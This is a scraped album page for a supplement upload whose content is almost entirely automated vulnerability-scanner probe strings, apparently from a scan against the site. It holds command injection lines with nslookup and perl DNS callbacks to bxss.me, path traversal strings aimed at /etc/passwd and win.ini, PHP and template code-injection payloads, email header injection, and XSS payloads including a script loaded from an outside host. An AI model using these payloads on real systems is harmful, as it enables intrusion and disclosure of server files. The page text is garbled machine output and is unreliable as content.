Uploaded on February 14, 2024 by toipureab To Album: How Does Toxipure Work In Your Body?
pHqghUme
1BaYiteDNgO
response.write(9369602*9465982)
'+response.write(9369602*9465982)+'
"+response.write(9369602*9465982)+"
pVlBAFjO
%0abcc:009247.112235-139020.112235.7a366.19767.2@bxss.me
echo xnkfio$()\ laxzix\nz^xyu||a #' &echo xnkfio$()\ laxzix\nz^xyu||a #|" &echo xnkfio$()\ laxzix\nz^xyu||a #
to@example.com>%0d%0abcc:009247.112235-139021.112235.7a366.19767.2@bxss.me
&echo ykshbk$()\ wxrvvf\nz^xyu||a #' &echo ykshbk$()\ wxrvvf\nz^xyu||a #|" &echo ykshbk$()\ wxrvvf\nz^xyu||a #
|echo ynbjez$()\ jgdhvs\nz^xyu||a #' |echo ynbjez$()\ jgdhvs\nz^xyu||a #|" |echo ynbjez$()\ jgdhvs\nz^xyu||a #
(nslookup hithwfydfggssd667e.bxss.me||perl -e "gethostbyname('hithwfydfggssd667e.bxss.me')")
$(nslookup hitfqthsvaczc49f80.bxss.me||perl -e "gethostbyname('hitfqthsvaczc49f80.bxss.me')")
<esi:include src="http://bxss.me/rpb.png"/>
&nslookup hitqkrsolbhdie5a98.bxss.me&'\"`0&nslookup hitqkrsolbhdie5a98.bxss.me&`'
&(nslookup hitndqbronrvja2877.bxss.me||perl -e "gethostbyname('hitndqbronrvja2877.bxss.me')")&'\"`0&(nslookup hitndqbronrvja2877.bxss.me||perl -e "gethostbyname('hitndqbronrvja2877.bxss.me')")&`'
../../../../../../../../../../../../../../etc/passwd
|(nslookup hitzabgwwdxuc0fbb5.bxss.me||perl -e "gethostbyname('hitzabgwwdxuc0fbb5.bxss.me')")
../../../../../../../../../../../../../../windows/win.ini
`(nslookup hitgyegdziqlo2a6eb.bxss.me||perl -e "gethostbyname('hitgyegdziqlo2a6eb.bxss.me')")`
${9999015+10000166}
;(nslookup hitrrquuawdfj44f69.bxss.me||perl -e "gethostbyname('hitrrquuawdfj44f69.bxss.me')")|(nslookup hitrrquuawdfj44f69.bxss.me||perl -e "gethostbyname('hitrrquuawdfj44f69.bxss.me')")&(nslookup hitrrquuawdfj44f69.bxss.me||perl -e "gethostbyname('hitrrq
file:///etc/passwd
../../../../../../../../../../../../../../../proc/version
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
../../../../../../../../../../etc/passwd%00.jpg
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
&n957919=v949136
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
/etc/passwd
%2fetc%2fpasswd
/.././.././.././.././.././.././.././../etc/./passwd%00
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
../././../././../././../././../././../././../././../././../././../././etc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
)
invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
!(()&&!|*|*|
^(#$!@#$)(()))******
/\../\../\../\../\../\../\../etc/passwd
/WEB-INF/web.xml
C:\WINDOWS\system32\drivers\etc\hosts
../../../../../../../../../../windows/win.ini%00.jpg
/../../../../../../../../../../boot.ini
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt%3F.jpg
/etc/shells
c:/windows/win.ini
bxss.me
'.gethostbyname(lc('hitts'.'mvvrehqp74e70.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(68).chr(102).chr(76).'
".gethostbyname(lc("hitkk"."uptvakfh5895a.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(71).chr(109).chr(80)."
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(119).concat(65).concat(116).concat(78)+(require"socket"
Socket.gethostbyname("hitat"+"hbdfbpda41452.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(101).concat(80).concat(103).concat(87)+(require'socket'
Socket.gethostbyname('hitzc'+'pjjzxwel98cc9.bxss.me.')[3].to_s)+'
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
1'"()&%<zzz><ScRiPt >5Ojn(9021)</ScRiPt>
'"()&%<zzz><ScRiPt >5Ojn(9167)</ScRiPt>
19477746
bfg3975%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl3975
bfgx6919%C0%BEz1%C0%BCz2a%90bcxhjl6919
<%={{={@{#{${dfb}}%>
1
<th:t="${dfb}#foreach
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
..\..\..\..\..\..\..\..\windows\win.ini
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
dfb{{98991*97996}}xca
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
WEB-INF/web.xml
dfb[[${98991*97996}]]xca
WEB-INF\web.xml
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z"
"o")
bfg10451%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl10451
bfgx5547%C0%BEz1%C0%BCz2a%90bcxhjl5547
'"
xfs.bxss.me
<!--
1%22onmouseover=5Ojn(99542)%22
1"onmouseover=5Ojn(96302)"
1" fGCi=5Ojn([!+!]) nIH="
1\u0022onmouseover=5Ojn(99593)\u0022
%31%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%35%4F%6A%6E%28%39%32%31%30%34%29%22
ö"onmouseover=5Ojn(94065)//
1"sTYLe='zzz:Expre/**/SSion(5Ojn(9347))'bad="
1"><script>5Ojn(9583)</script>
1<ScRiPt >5Ojn(9490)</ScRiPt>
1<WW6RU0>CUAL4[!+!]</WW6RU0>
1<script>5Ojn(9977)</script>
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%35%4F%6A%6E%28%39%32%38%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1<ScRiPt
>5Ojn(9952)</ScRiPt>
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9571></ScRiPt>
1<